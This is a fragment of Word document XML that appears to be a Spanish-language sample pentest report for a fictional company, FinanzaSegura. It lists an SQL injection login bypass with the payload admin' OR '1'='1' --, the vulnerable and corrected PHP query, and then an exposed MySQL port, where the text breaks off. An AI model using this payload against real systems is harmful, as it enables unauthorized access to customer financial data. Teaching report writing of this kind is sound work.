        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D014F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EJEMPLO PRÁCTICO DE REPORTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A96393" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBF4564" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="776A19C9" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DA385E3" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27D30A17" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="617A0712" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AF06E78" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E760657" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70368C44" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="385C0D0F" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="171AA7B2" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AA47814" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="494FEFA7" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CFC0103" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D670AD1" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="693F2E96" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50D27B36" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E1588B8" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="023A1143" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2102B5B2" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4888BEF2" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5E7944" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B6EE4C1" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71EF8C93" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DC2DE31" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="247B5D48" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E32FED3" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BF55B03" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="009B1DD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67A" w:rsidRPr="00FF1ECC" w14:paraId="354F6A18" w14:textId="77777777" w:rsidTr="0018367A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1749B5D3" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:lastRenderedPageBreak/>
              <w:t>═══════════════════════════════════════════════════</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01D11C46" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidRPr="002967CF">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>INFORME DE HACKING ÉTICO - FINANZASEGURA</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E365AE2" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:t>═══════════════════════════════════════════════════</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16496573" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A"/>
          <w:p w14:paraId="18C5B2FD" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>1. RESUMEN EJECUTIVO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73704EF3" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>━━━━━━━━━━━━━━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3691C593" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:t xml:space="preserve">Severidad General: </w:t>
            </w:r>
            <w:r w:rsidRPr="0018367A">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🔴</w:t>
            </w:r>
            <w:r w:rsidRPr="0018367A">
              <w:t xml:space="preserve"> CRÍTICA</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="115577A4" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A"/>
          <w:p w14:paraId="16DB7CE3" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:t>Se identificaron 12 vulnerabilidades:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D52CDAE" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:t>- 3 Críticas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CA97568" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:t>- 5 Altas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C0A17E2" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:t>- 4 Medias</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A4311BD" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A"/>
          <w:p w14:paraId="2A0C7B4B" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Riesgo principal:</w:t>
            </w:r>
            <w:r w:rsidRPr="0018367A">
              <w:t xml:space="preserve"> Acceso no autorizado a base de datos </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BE2BAD9" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:t>de clientes con información financiera sensible.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0426DF11" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A"/>
          <w:p w14:paraId="6248468C" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>2. VULNERABILIDADES CRÍTICAS ENCONTRADAS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09C74B9E" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DACAF4F" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A"/>
          <w:p w14:paraId="24CE4B68" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="005A47CF">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>🚨</w:t>
            </w:r>
            <w:r w:rsidRPr="005A47CF">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> VULNERABILIDAD #1:</w:t>
            </w:r>
            <w:r w:rsidRPr="0018367A">
              <w:t xml:space="preserve"> SQL Injection en login</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="192FA93A" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="547BE4BE" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Ubicación</w:t>
            </w:r>
            <w:r w:rsidRPr="0018367A">
              <w:t>: test.finanzasegura.com/admin/login.php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30034296" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:t>CVSS: 9.8 (CRÍTICO)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="081E4E1C" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A"/>
          <w:p w14:paraId="0DA744F1" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0018367A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="650C90F0" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:t xml:space="preserve">Mediante inyección SQL, se puede bypasear la autenticación </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E213AA7" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:t>y acceder al panel administrativo.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BD3EEFC" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A"/>
          <w:p w14:paraId="1C841CFB" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="005A47CF" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A47CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Evidencia:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13587E16" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:t>[Screenshot del bypass exitoso]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44E9CE9C" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:t>Payload utilizado: admin' OR '1'='1' --</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58A80E7D" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A"/>
          <w:p w14:paraId="4240A6C1" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="005A47CF" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A47CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impacto:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="454A0FAE" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:t>- Acceso completo al panel de administración</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="454870AF" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:t>- Posible extracción de 150,000 registros de clientes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0717C7B0" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:t>- Modificación de transacciones financieras</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="365463CF" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A"/>
          <w:p w14:paraId="5E85D0DE" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="005A47CF" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A47CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Recomendación:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EAAB83A" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:t>1. Implementar prepared statements en todas las consultas SQL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="066A7246" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:t>2. Validar y sanitizar todas las entradas de usuario</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CAE9BCE" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0018367A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3. Implementar Web Application Firewall (WAF)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="119C0668" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="0018367A">
              <w:t>4. Retirar el subdominio test.finanzasegura.com de producción</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29AE6BB8" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A"/>
          <w:p w14:paraId="23674491" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="005A47CF" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A47CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Código vulnerable:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BBE3688" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0018367A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$query = "SELECT * FROM users WHERE user='$username' AND pass='$password'";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B3EE0A9" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="163DAAC2" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="005A47CF" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A47CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Código correcto:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56CC9583" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0018367A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$stmt = $pdo-&gt;prepare("SELECT * FROM users WHERE user=? AND pass=?");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0190B5E9" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0018367A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$stmt-&gt;execute([$username, $password]);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="279F4DAA" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A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27B88D43" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="0018367A">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="767F35F5" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="0018367A">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="58678801" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRDefault="005A47CF" w:rsidP="0018367A">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1A0D8E00" w14:textId="77777777" w:rsidR="005A47CF" w:rsidRPr="0018367A" w:rsidRDefault="005A47CF" w:rsidP="0018367A">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="503ACA31" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7A6B8C1B" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A47CF">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>🚨</w:t>
            </w:r>
            <w:r w:rsidRPr="005A47CF">
              <w:rPr>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> VULNERABILIDAD #2:</w:t>
            </w:r>
            <w:r w:rsidRPr="0018367A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> MySQL expuesto públicamente</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AEAE94A" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0018367A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71046A8F" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="002967CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Puerto:</w:t>
            </w:r>
            <w:r w:rsidRPr="0018367A">
              <w:t xml:space="preserve"> 3306/TCP abierto en 192.168.1.50</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5178F65F" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A">
            <w:r w:rsidRPr="002967CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CVSS:</w:t>
            </w:r>
            <w:r w:rsidRPr="0018367A">
              <w:t xml:space="preserve"> 9.1 (CRÍTICO)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28906F42" w14:textId="77777777" w:rsidR="0018367A" w:rsidRPr="0018367A" w:rsidRDefault="0018367A" w:rsidP="0018367A"/>
          <w:p w14:paraId="71E18161" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D1677">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Descripción:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="732D665D" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t xml:space="preserve">El servidor MySQL está accesible desde Internet sin </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FBCEF01" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t xml:space="preserve">restricciones de firewall, permitiendo intentos de </w:t>
            </w:r>
          </w:p>
